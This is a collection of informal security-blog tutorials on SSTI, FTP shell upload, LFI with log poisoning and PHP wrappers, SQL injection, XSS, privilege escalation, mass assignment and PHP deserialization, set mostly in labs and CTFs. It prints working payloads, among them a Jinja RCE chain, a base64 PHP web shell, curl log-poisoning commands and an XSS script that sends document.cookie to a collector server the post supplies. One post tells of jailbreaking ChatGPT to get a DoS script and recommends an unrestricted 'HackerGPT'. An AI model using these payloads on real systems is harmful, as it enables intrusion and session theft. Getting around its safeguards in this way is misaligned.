Yo yo miss me right? Guess what Im back🥳🥳So lets talk about SSTI or Server-side template injection

As usually we need to works with things before jumping into SSTI. So lets try a template engine and learn what is it

Lets use a Template engine

A template engine is a software component designed to generate dynamic content based on a combination of pre-defined templates and data sources.

Bruh Let’s simplify this😂😂Basically, a template engine is a software component that generates dynamic content from our templates and fills the components of our template based on user data

ok so lets see a example

So im using jinja template engine for this

from flask import Flask,render_template_string

app = Flask(__name__)
@app.route('/hello/')
@app.route('/hello/<name>')
def hello(name=None):
    return render_template_string("<h1>Hi!!  "+name+"</h1>")

this app directly renders user data without escape or anything so we can get xss out of this but we can fix this(and i didn’t)

Ok now we know little about template engine(I mean we don’t know lot of things about template engine)

so let’s see where ssti comes from

What is SSTI

Server-Side Template Injection (SSTI) is a type of security vulnerability that occurs when an attacker can inject and execute malicious code on the server-side template engine. This can lead to unauthorized access, data theft, and other malicious activities.

I know for first time who learn about ssti. this is harder to understand. so lets simplify this

in template engines we can run template syntaxes on it.

like this

from flask import Flask,render_template_string

app = Flask(__name__)

@app.route('/hello/')
@app.route('/hello/<name>')
def hello(name=None):
    return render_template_string("{{3*3}}")

the output will be like this

ok i think you are getting it.so do you remember i told you that there is a xss(also ssti) cause this app renders user data without any security method

from flask import Flask,render_template_string

app = Flask(__name__)

@app.route('/hello/')
@app.route('/hello/<name>')
def hello(name=None):
    return render_template_string("<h1>Hi!!  "+name+"</h1>")

ok now lets see what will happen if we put template syntax into this

did you see that it rendered our syntax and gave us the result of 3*3 wich is 9🥳🥳

yeeah we injected a template syntax to the app and it rendered by the template engine

so ssti is a vuln where attacker can inject native template syntax payload to server side template and then it will execute on server side.now lets get RCE with SSTI

Remote Code execution

I know what are you thinking. youre thinking “we can just import the os module and get rce”.hmmm thats not gonna work.

so it wont work cause jinja isn’t allow to import modules in template native syntaxes. but don’t worry there is a way.

so you know everything object in python

thats right python is OOP lang and on python everything is a object

so lets try get access to the os module by accessing the objects

and lets keep going by accessing classes

ok now lets get all sub classes from base class

Okay, now what we need to do is to select a subclass that has sys modules.

so warnings.catch_warnings module uses sys module so Im gonna use it

so lets access the sys module

so lets access os module

ok now lets run a command with this

so lets do this in our web app and get our payload

and i got my payload

{{"isuk4".__class__.__base__.__subclasses__()[162].__init__.__globals__['sys'].modules['os'].popen('whoami').read()}}

so lets run this

so this is it SSTI.remember I only used jinja for this post there are other template engines

echo "so GGS!Ima off"

so GGS!Ima off

Yo yo homies I’m back . yeah this post is in a different category than my other post(that’s why my banner template changed)

so first we need to talk about what is FTP and why are we using it

What is FTP

The File Transfer Protocol is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network

Aaaugh too long bruh so lets simplify this

so basically FTP is a network protocol that transfer files between computers over TCP/IP-based network

so why do we use it for web application?

web apps don’t need FTP. but some cases developers use FTP to maintain web apps

ok so I can give you a real world scenario(gen by Gemini)

now we need to learn how we can manage ftp connection because we can’t attack to a ftp server without having knowledge of ftp connection management

How to manage ftp connection

okay lets see how do we connect to the ftp connection

So First I’m scanning ports and

so now we know lil info about the server and we found a jackpot(anonymous login for ftp)

so lets login to ftp via anonymous

ok lets explore this yeeeah

so lets see how we can deface a web with this(at least get website data)

Now we need to setup a lab to exploit

Setup a lab to exploit

So Im gonna make simple php page that include images in “folder” and I’m uploading images with ftp

https://gist.github.com/isuk4s4/e5d170edfd10af4343b9f87909d02c0

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Image Gallery</title>
 <style>
body {
  font-family: Arial, sans-serif; 
  margin: 0;
  background-color: #222; 
  color: #fff; 
}

.gallery {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
  padding: 20px;
  max-width: 1000px;
  margin: 0 auto;
}

.gallery img {
  margin: 10px;
  width: 250px; 
  border-radius: 5px;
  transition: transform 0.3s ease-in-out;
}

.gallery img:hover {
  transform: scale(1.05); 
  box-shadow: 0 0 5px rgba(0, 0, 0, 0.3); 
}

h1 {
  text-align: center;
  margin-bottom: 20px;
  font-weight: 300;
  font-size: 2em;
  letter-spacing: 1px; 
  color: #ddd;
}


 </style>
</head>
<body>
  <h1>Image Gallery</h1>
  <div class="gallery">
    <?php
      $images_dir = "gallery/";

      if ($dir = opendir($images_dir)) {
        while (false !== ($file = readdir($dir))) {
          if (strpos(strtolower($file), ".jpg") !== false || strpos(strtolower($file), ".png") !== false || strpos(strtolower($file), ".gif") !== false|| strpos(strtolower($file), ".webp") !== false) {
            echo "<img src='" . $images_dir . $file . "' alt='" . $file . "'>";
          }
        }
        closedir($dir);
      } else {
        echo "Error: Could not open image directory.";
      }
    ?>
  </div>
</body>
</html>

and lets setup the ftp server

if you’re trying this on linux read this cause im doing this in my windows machine

How to setup and configure an FTP server in Linux? - GeeksforGeeks

A Computer Science portal for geeks. It contains well written, well thought and well explained computer science and…

www.geeksforgeeks.org

So lets make the ftp server

• go to the Programs and Features and turn on these features

• and press conform
• now open IIS Manager and add a FTP site

Tap tap tap oh wait there is something important

yeeah this is why we can get a vulnerable ftp servers(this is only one vuln.there are some other vulns in some ftp servers)

• allow ftp through windows firewall

and lets see

yeeah now we got our ftp server and lets exploit this

So forgot about all things we know about this application and process this cause we made this lab and we know how we can exploit this

lets enumerate this

Enumeration

Yeeah again “We got a jackpot” it enabled anonymous login

so lets login

ok lets upload a shell

and all we need to do is upload this shell to the server

so lets check it

we can’t see our shell in the gallery cause it only shows images but we can find the path from browser

yeeah there it is our lil shell lets open it and test it

so this is it. but this is a only one way to do this and there are many things in ftp.GGS

echo "GGS!Ima Off";

Yo yo homies Guess what? I lunched my web .ok so you can see my crackhead blog and portfolio :- so lets start

Layout handling is crucial in web dev .But sometimes silly dev use to handle layout like this

http://example.com/home.php?page=profile.php

And as we navigate through this layout the page parameter changes to filenames

So lets see how it can be a security risk.

What is LFI

Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server.

Simply LFI is attack technique that attacker running or exposing files from server😎

So lets see examples of LFI

LFI example

this is ctf(picoCTF forbidden path) so notice that real world application can be different

this website includes any files that we input to this web so I’m trying to get /etc/passwd from this web

Booom .Now I think you understood what is LFI.so lets see how we can exploit this

There are lots of ways to exploit LFI it is depends the system .so lets see what are the ways to get rce from LFI

• PHP Wrappers
• Log poisoning
• Uploaded File inclusion

PHP Wrappers

PHP stream wrappers are a feature that provides a unified way of accessing different types of data sources or protocols using a common interface. In essence, stream wrappers allow you to use the same set of functions to read from or write to various types of resources, such as files, HTTP, FTP, databases, and more. They abstract the underlying complexity of handling different types of streams.

ok lets see how we can use this to exploit lfi

so you can see this page is include the file in lang parameter.so i tried to include /etc/passwd to the page

yeeah there is a lfi :) so lets get a RCE from data wrapper

first we need to check is allow_url_include enabled or not cause data wrapper only available when allow_url_include enabled . ok lets check

php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini

we use a wrapper again😂in this we encode the php.ini file cause prevent it from execute from the web

now lets run and check

and we need to decode it

echo "W1BIUF0KCjs7Ozs7Ozs7Ozs7Ozs7Ozs..." | base64 -d | grep allow_url_include

and out put will like this

allow_url_include = On

ok so lets do this then

You know we can use data wrapper to include external data to web(include php)

<?php

$fp = fopen('data:text/plain,'.urlencode($data), 'rb'); // urlencoded data

$fp = fopen('data:text/plain;base64,'.base64_encode($data), 'rb'); // base64 encoded data

?>



Demonstration of invalid usage:

<?php

$data = 'Günther says: 1+1 is 2, 10%40 is 20.';



$fp = fopen('data:text/plain,'.$data, 'rb'); // INVALID, never do this

echo stream_get_contents($fp);

// Günther says: 1 1 is 2, 10@ is 20. // ERROR



$fp = fopen('data:text/plain,'.urlencode($data), 'rb'); // urlencoded data

echo stream_get_contents($fp);

// Günther says: 1+1 is 2, 10%40 is 20. // OK



// Valid option 1: base64 encoded data

$fp = fopen('data:text/plain;base64,'.base64_encode($data), 'rb'); // base64 encoded data

echo stream_get_contents($fp);

// Günther says: 1+1 is 2, 10%40 is 20. // OK

?>

so we are gonna get a reverse shell from data wrapper

echo '<?php system($_GET["cmd"]); ?>' | base64

PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==

so we are gonna include this base64(we can also use urlencode ) code and decode it on the web site so it will execute the php code

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=whoami

so it worked .Now lets see how we can do this with log poisoning

What is Log poisoning

Log poisoning is attack technique that inject a malicious code to server log files.so we can include that log file and execute that:

so lets see how we can do it

So you know log files log our request detail so if we inject malicious code to a request header that means it will saved on the log.

so lets start

So i found the log file and included it .Now I’m going to log poisoning

Ok I sent a request with curl and set my user agent as php code that ouput the username

curl -A "<?php system('whoami'); ?>" 94.237.62.99:37999/index.php?language=en.php

yeeah it gives us the username “www-data”. so let me try another code

curl -A "<?php phpinfo(); ?>" 94.237.62.99:37999/index.php?language=en.php

yeah baby So this is it Log poisoning

but There is an always catch.

Some website have lfi with stranded php extenion

<?php 
include($_GET['file'].".php");
?>

So what can we do for this

• we can get the source code of files
• we can try to get rce with pearcmd.php

we can get the source code of files

so I told you about php wrappers. now we can use those things for to get source code.

Do you remember that How I got the php.ini file.now we are gonna do the same

base64 it with php wrapper

yeeah all we need to do now is decode this and get the source code

echo "PD9waHAKJHAyID0gIjxwPlRoZSBpZGVhIG9mIH…" | base64 -d

So let’s talk about the Pearcmd method in the next post because if I add more things, the post will be boring

So I will be back with LFI part 2

echo "I will be back with LFI part 2"

So recently I went to Bugcrowd and saw a report paper called Inside the Mind of a Hacker So when I read that newspaper, I remembered what was done these days.so Lets start.

process of Generative ai

So AI generates the response to our input as they were trained. hmmm

so I used AI to different things(I mean for Pentesting purpose)

• Code analysis
• Conforming vulns
• Write exploits

like that but There are more things that we can do with AI. that Paper “Inside the mind of hacker” tells us there are lots of use cases from Ai

But there are some problems brrrr.like Ai bots won’t directly allow you to generate such things like they have rules

But I can do this with another way .mmmm like if I can think how that script need to work I can generate with another prompts

i mean look at this beautiful chat.

so like that there are lots of use cases and sometimes we even need jailbreak chat gpt

What is Jailbreaking

Jailbreaking is the process of removing software restrictions imposed by the manufacturer or operating system on devices like smartphones and tablets

How can we do it?

So we enter our inputs to Ai bot and it generate the ouput to our input.so we can input something to the ai for jailbreak

I tried few prompts but all are failed. but I could find a one prompt that works

ChatGPTChatGPT is a free-to-use AI system. Use it for engaging conversations, gain insights, automate tasks, and witness the…chat.openai.com

yessier I Dos script from chat gpt 😎😎but there is a catch

you see the chat gpt wont generate scripts for attacks and we need to jailbreak or do something for it and its not very practical so I searched ways to do this without jailbreak then i Found a golden website

Ladies and Gentlemen welcome the HackerGPT

In hacker gpt you don’t need any jailbreak techniques it will do any thing that do with hacking

And this can be bad and good

So this is it Era of hacking with ai

echo "GGS!Ima off"

So GGS!Ima off

Yo homies I’m back with another post.so lets start

Before we dive into second order sql injection we need to talk about what is sql injecion

What is Sql injection

So Sql injection is attack that inject a malicious sql query to Application that can be execute

SELECT * FROM `users` WHERE `name`='Isuk4' AND `pass`='Isuk4';

but what if attacker insert a sql query to this

SELECT * FROM `users` WHERE `name`=' ' OR '1' AND `pass`=' ' OR '1';

So I think you already know this.heeee

so lets deep dive into Second order sql injection

What is Second order attack

so in first order attack(i mean any first order attack) the payload will execute immediately but its different in second order attacks.in second order attacks payload will stored and execute after.🤢🤢

hmm let me tell this straight.so in second order attacks payload execute after like if we inject a payload and it will execute after in the application in other pages or other functions

I think you got that 😎

So I download a example page for second order sql injection

here is the link — https://github.com/riyazwalikar/sql-injection-training-app

ok I setup that and i went to the phpmyadmin and saw there is a user called admin so my mission is to get the admin password and get the admin user(although I can do it with phpmyadmin)

ok i went to second order example page

ok I now im trying to find is there a second order sql injection in this web(lol this a example application)

i tested it with add single quotes to inputs

ok this page hasn’t a vuln.but when I went to “Change password” page i got this

hmm so found the vuln.so I need to achieve my goal

so I inject a payload for it

' or 1 in (select password from users where username='admin') – //

yeeah now all i need is decrypt this with MD5

yeeeah baby

so this is it.but remember this is a easy example real world applications can be different and hard to find vulns :-

so Ima off

echo "GGS! Ima off"

Yo yo homies.im back with another post.so lets start

Hmmm.Did you chat with live agents on any day? If you did that, you know that it’s a real time chat. like live agent can see you’re Mg in real time

so how does developer make that? well there is way called websocket

How does websocket work

WebSockets work by establishing a persistent connection between the client and server over a single TCP socket. Once the connection is established, data can be sent and received in real-time between the client and server.

Damn. we can use this thing to do lots of work

hmm so lets deep dive into this

So there are lots of vulns that can be come with websockets

XSS with web sockets

so in web sockets we can still inject js payloads brrrr.but its kinda different. actually not that different.so lets hop into that

okay now I demonstrate with a portswigger lab

okay so i access the live chat

when i click and inspect this request with burp suite

its a webscoket request and i managed to edit this request to xss payload

and boom💥💥

And remember these vulns aren’t only limited to xss. these can leads to lots of vulns like sqli injection ,xxe, nosql injection.so like basicly this is just normal web vulns but in websocket protocol

so ima off

echo "GGS!Ima off";

Hey I’m back with another interesting topic.First of all did you notice anything new.yep a new cover its because this is out of web hacking.lets start

first of all we need to talk about what is privilege escalation

01. What is privilege escalation☠️

So you know that in a os there is users .all users have privileges for each them and that can be different while some users can read and write files some users only can read files😒

but there is user that can done everything we call him “root”

ok there are ways to get root access without authorization by exploiting vuln or bugs ,etc… that’s what we call privilege escalation .here I’m going explain this properly

so basically privilege escalation is process of gain privileges permissions that without a authorization .this can be done with exploiting vuln or bugs. ok now lets see how we can do it.

the way of doing this can be different .first we need to enumerate the os

02. Enumerate the os

usually first I’m trying to get os information

first I search for kernel version

if there is a exploit for kernel we can exploit and gain root privileges.i can exploit the sys and gain root privileges like this.boom 💥

if there isn’t a vuln for it.we need to focus that can run with sudo.
we need to find the allowed commands that a user can execute with root privileges.

im the admin of my machine so i didn’t give any permissions to any files.

ok so i need to demonstrate this with tryhackme mchine

03. Exploit

lets exploit💥💥

hmmm i think you see that.the system allowed run nano,find,less in sudo privileges

i use GTFObins to find a way to get root privileges with nano.less,find but i decided to get root with less

boom i got the root.and this is long process that manually enumerate the system so we can use scripts such as LinPEAS,LES

ok there are lots of techniques.i can’t tell you all about my knowledge of linux privilege escalation in one post so i will be back with another post

echo "GGS!Ima off"

GGS!Ima off

Heey after about week im back so lets start.

so first this story begins with my homie sent me a web backend develop with express.js to fix a bug😒so I fixed it but you know me😂after I fixed it I read the whole code.hmm there is a interesting thing to me.A code that he wrote for add users to db

app.post('/users', async (req, res) => {
  try {
   const userData = req.body;
   const newUser = new User(userData);
   await newUser.save();
   res.status(201).json({ message: 'User created successfully', user: newUser });
  } catch (error) {
   console.error(error);
    res.status(500).json({ message: 'Internal Server Error' });
  }
});

ok so what’s wrong with this.

let me explain

i sent few requests and found that if i can send db column names and value for each column in a request it can be add to the db😲so like if there is a column in db called role(define a role for user) i can sent a request with whatever role that i need to and it can be added to the db

ok so let me simple it

its like if i sent request have same mass that program can insert it can be stored or i can say it like this “developers inject an entire set of user-entered data from a form directly into an object or database” this is what we called mass assignment.

so if sent a request like this

POST /users HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Content-Type: application/json
Content-Length: 107  
Accept: application/json
Custom-Header: Custom-Value

{"username":"example", "email":"example@example.com", "password":"secret","role":"admin"}

boom i created a admin user without any permissions😂so like it is what is it.so lets see what this dude can do to systems(i mean mass assignment)

Risks of mass assignment

1. Unauthorized Access:

• Attackers may exploit mass assignment to modify user roles or permissions, gaining unauthorized access to sensitive areas of the application or system.

2. Elevation of Privileges:

• An attacker could manipulate object properties to elevate their privileges within the system, gaining access to functionalities or data they are not supposed to have.
  Data Tampering:
• etc …

Mass assignment vulnerabilities can be exploited to modify or tamper with critical data, potentially leading to data integrity issues and incorrect processing of information.

ok so this is it ima gonna write my research paper on insecure deserialization

So lets begin

What is Cross site scripting

if a website that directly renders user input it can be execute a html or js code that’s what we called xss or cross site scripting.

how it can be dangerous

1. Code Execution: One of the primary dangers of XSS is that it allows attackers to execute arbitrary code in the context of a user’s browser. This means the attacker can perform actions on behalf of the user, such as stealing sensitive information (like login credentials or session tokens), manipulating the appearance of the web page, or performing actions on the user’s behalf without their consent.
2. Session Hijacking: By stealing session cookies through XSS, an attacker can impersonate a legitimate user and gain unauthorized access to their accounts. This could lead to account compromise and unauthorized actions on the victim’s behalf.
3. Data Theft: XSS can be used to extract sensitive data from a user’s browser. For example, an attacker might craft a malicious script that sends user data (such as passwords or personal information) to a server under the attacker’s control.
4. Phishing Attacks: XSS can be employed to create realistic-looking phishing pages. When users unknowingly interact with these pages, their login credentials or other sensitive information can be captured by the attacker.
5. Drive-by Downloads: In some cases, XSS can be used to deliver malicious payloads, such as malware or other exploit code, to a user’s system. This can lead to further compromises beyond the scope of the web application.
6. Defacement: XSS can be used to deface websites, altering the appearance of the site to spread political or ideological messages, causing reputational damage to the affected organization.
7. SEO Poisoning: Attackers can use XSS to inject links or content that manipulates search engine rankings, redirecting users to malicious websites or spreading malware.

ok ima gonna explain about three types

Main Three types of xss

• Stored XSS (Persistent XSS): In this type, the malicious script is permanently stored on the target server, often in a database. When a user accesses a particular page or resource containing the injected script, it is retrieved and executed in their browser.
• Reflected XSS (Non-Persistent XSS): In this case, the malicious script is embedded in a URL or another input, and it is immediately reflected back to the user. The attack is typically carried out by tricking the user into clicking on a crafted link that contains the malicious payload.
• DOM-based XSS: This occurs when the DOM (Document Object Model) is manipulated by malicious scripts on the client side. The attack takes place within the Document Object Model, and the injected script is processed by the client’s browser.

DOM Invader

DOM Invader is tool that made by Portswigger.that can read dom data in web.so what is that doing for us😑

if it can find DOM data.it can finds dom based xss to

so let me give you a example

Hmm its like its search for text “Isuk4” in DOM

So i search it to check if DOM Invader can find that text in DOM.So it found it.yeeey😉

so when i click exploit.Booom💥💥

So like we talked about plenty of thing.mmm and I think we need to talk about Cookie with xss.

Cookie stealing with xsss

So i think you know that js can get cookie values.bro if you don’t know just type alert(document.cookie); in you’re browser console

Ok now you know so lets write script for it baby

from http.server import BaseHTTPRequestHandler, HTTPServer
import base64
from urllib.parse import urlparse, parse_qs

class RequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):

        parsed_url = urlparse(self.path)
        query_params = parse_qs(parsed_url.query)

        if 'data' in query_params:
            original_data = query_params['data'][0]

            try:
                data = base64.b64decode(original_data.encode('utf-8')).decode('utf-8')
                print("Received request:")
                print("cookie:", data)

                self.send_response(200)
                self.end_headers()
            except Exception as e:
                self.send_response(500)
                self.end_headers()
                self.wfile.write(f"Error processing request: {str(e)}".encode('utf-8'))
        else:
            self.send_response(400)
            self.end_headers()
            self.wfile.write("Missing 'data' parameter in the URL.".encode('utf-8'))

if __name__ == '__main__':
    server_address = ('', 8000)
    httpd = HTTPServer(server_address, RequestHandler)
    print('Server running on port 8000...')
    httpd.serve_forever()

mm run this code and exploit the xss by

<script>fetch(‘http:ip:8000/data=’+btoa(document.cookie));</script>

echo "GGS!Ima off";

GGS!Ima off

so do you remember our last post we talked about Insecure deserializion and PHP object injection(yeah i know that POI is a type of Insecure …) so lets continue this

What is serialization?

simply serialization is a process of convert object into text format that can be restored

so whats the problem of here? let me explain

What is insecure deserialization?

when a web site or some application try to restore the serialized object into the its original object it can be dangerous.but how it can be dangerous.so when a serialized object restore to the original object it rebuilds that object with data that we give.so if attacker can give malicious data to our serialized object.that’s a Insecure deserialization

What is a Gadget chain?

So Gadget chain is a sequence of function calls or code snippets that crafted maliciously.Hmmm if you don’t understand it try this example

imaging this is cookie data that contains user data but its serialized

O:6:"Person":2:{s:4:"name";s:5:"Alice";s:3:"age";i:25;}

but how can I exploit.if i edit this object for access another user like this

O:6:"Person":2:{s:4:"name";s:5:"administrator";s:3:"age";i:25;}

its return this

but why?so if we need to understand it,we need to understand about serialized data format

ok i think that you understood this

now we can see the problem there

O:6:"Person":2:{s:4:"name";s:5:"administrator";s:3:"age";i:25;}

“named” property’s length is wrong because it has chars 13.so that why it return error.if we correct it like this

O:6:"Person":2:{s:4:"name";s:13:"administrator";s:3:"age";i:25;}

it won’t return any error.so like do we need to count and make this so hard to exploit.Naah we won’t.that’s why we use phpggc().

so as I explained what is a Gadget chains.now we are gonna make a our own gadget chain😲😲

Creating our own Gadget Chain😎

so we know that the name of the object is Person and there are two properties called name and age.so im gonna write a php code

<?php

//creating a class 
class Person
{
    //creating properties
    public $name;
    public $age;


    public function __construct($name,$age)
    {
        //Takes two arguments, $name and $age, and assigns them to the corresponding properties
        $this->name = $name;
        $this->age = $age;
        
    }
 
}
    //make the object
    $person = new Person("administrator","16");
    //get the malicious serialized object
    echo serialize($person);

?>

i think you got it.simply i just rebuild the object😂like you can see what is the serialize data really says.ok if there is big object what should we do?in that case we can use automated gadget chain develop tools such as ysoserial,phpggc

Okay ima gonna of.Because now it’s 03:00

echo "GGS!Ima off";

GGS!Ima off